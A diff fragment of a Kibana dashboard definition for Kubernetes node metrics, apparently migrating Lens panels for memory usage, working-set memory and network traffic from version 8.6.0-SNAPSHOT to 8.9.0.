"operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "3bc424fc-c689-46a6-a701-f2a256b700b1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "b8d52304-59e9-4635-80b0-dac037233757": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", - "isFormulaBroken": false - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "scale": "ratio" - }, - "b8d52304-59e9-4635-80b0-dac037233757X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.usage.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.capacity.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "location": { - "max": 86, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", - "type": "function" - } - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "89318796-9c5f-41c0-be0f-5545f0012e08", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "b8d52304-59e9-4635-80b0-dac037233757": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b8d52304-59e9-4635-80b0-dac037233757" - ], - "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", - "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", + "isFormulaBroken": false + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "scale": "ratio" + }, + "b8d52304-59e9-4635-80b0-dac037233757X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.usage.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.capacity.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "location": { + "max": 86, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.memory.usage.bytes)/max(kubernetes.node.memory.capacity.bytes)", + "type": "function" } + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "89318796-9c5f-41c0-be0f-5545f0012e08", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b8d52304-59e9-4635-80b0-dac037233757" + ], + "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", + "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 13, - "i": "64187c9b-8038-47a3-b7df-6562d740840f", - "w": 24, - "x": 24, - "y": 20 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "64187c9b-8038-47a3-b7df-6562d740840f", - "title": "Memory usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { + "columnOrder": [ + "3bc424fc-c689-46a6-a701-f2a256b700b1", + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", + "b8d52304-59e9-4635-80b0-dac037233757", + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1", + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "columns": { + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "3bc424fc-c689-46a6-a701-f2a256b700b1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { - "columnOrder": [ - "3bc424fc-c689-46a6-a701-f2a256b700b1", - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", - "b8d52304-59e9-4635-80b0-dac037233757", - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1", - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "columns": { - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "3bc424fc-c689-46a6-a701-f2a256b700b1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "b8d52304-59e9-4635-80b0-dac037233757": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", - "isFormulaBroken": false - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "scale": "ratio" - }, - "b8d52304-59e9-4635-80b0-dac037233757X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.workingset.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.allocatable.bytes" - }, - "b8d52304-59e9-4635-80b0-dac037233757X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Memory Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "location": { - "max": 94, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", - "type": "function" - } - }, - "references": [ - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "b8d52304-59e9-4635-80b0-dac037233757": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "b8d52304-59e9-4635-80b0-dac037233757" - ], - "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", - "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", + "isFormulaBroken": false + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "scale": "ratio" + }, + "b8d52304-59e9-4635-80b0-dac037233757X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.workingset.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.allocatable.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "location": { + "max": 94, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", + "type": "function" } + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", - "w": 24, - "x": 0, - "y": 33 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", - "title": "Working set Memory usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "layers": [ + { + "accessors": [ + "b8d52304-59e9-4635-80b0-dac037233757" + ], + "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", + "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { - "columnOrder": [ - "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "d38a2561-f4cd-4374-93d3-52acc2b50f7b", - "e87c113a-2feb-4cca-8093-1c4f69fc9122", - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "columns": { - "4b5bd01c-47a8-4f48-ba67-69396e9add37": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.node.network.rx.bytes", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.node.network.rx.bytes" - }, - "4d608d6f-472c-433e-88a0-7794bfd9adb9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e87c113a-2feb-4cca-8093-1c4f69fc9122": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Network Incoming Bytes/s", - "operationType": "counter_rate", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "references": [ - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working set Memory usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { + "columnOrder": [ + "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "d38a2561-f4cd-4374-93d3-52acc2b50f7b", + "e87c113a-2feb-4cca-8093-1c4f69fc9122", + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "columns": { + "4b5bd01c-47a8-4f48-ba67-69396e9add37": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.node.network.rx.bytes", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.node.network.rx.bytes" + }, + "4d608d6f-472c-433e-88a0-7794bfd9adb9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e87c113a-2feb-4cca-8093-1c4f69fc9122" - ], - "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e87c113a-2feb-4cca-8093-1c4f69fc9122": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Network Incoming Bytes/s", + "operationType": "counter_rate", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "references": [ + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e87c113a-2feb-4cca-8093-1c4f69fc9122" + ], + "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 13, - "i": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", - "w": 24, - "x": 24, - "y": 33 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", - "title": "Network in by node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network in by node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", + "w": 24, + "x": 0, + "y": 46 + }, + "panelIndex": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "87c6048e-20a6-401c-bf42-72ae034ee2fa", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { + "columnOrder": [ + "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "d38a2561-f4cd-4374-93d3-52acc2b50f7b", + "e87c113a-2feb-4cca-8093-1c4f69fc9122", + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "columns": { + "4b5bd01c-47a8-4f48-ba67-69396e9add37": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.node.network.tx.bytes", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.node.network.tx.bytes" + }, + "4d608d6f-472c-433e-88a0-7794bfd9adb9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "87c6048e-20a6-401c-bf42-72ae034ee2fa", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { - "columnOrder": [ - "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "d38a2561-f4cd-4374-93d3-52acc2b50f7b", - "e87c113a-2feb-4cca-8093-1c4f69fc9122", - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "columns": { - "4b5bd01c-47a8-4f48-ba67-69396e9add37": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.node.network.tx.bytes", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.node.network.tx.bytes" - }, - "4d608d6f-472c-433e-88a0-7794bfd9adb9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e87c113a-2feb-4cca-8093-1c4f69fc9122": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Network Outgoing Bytes/s", - "operationType": "counter_rate", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "references": [ - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - 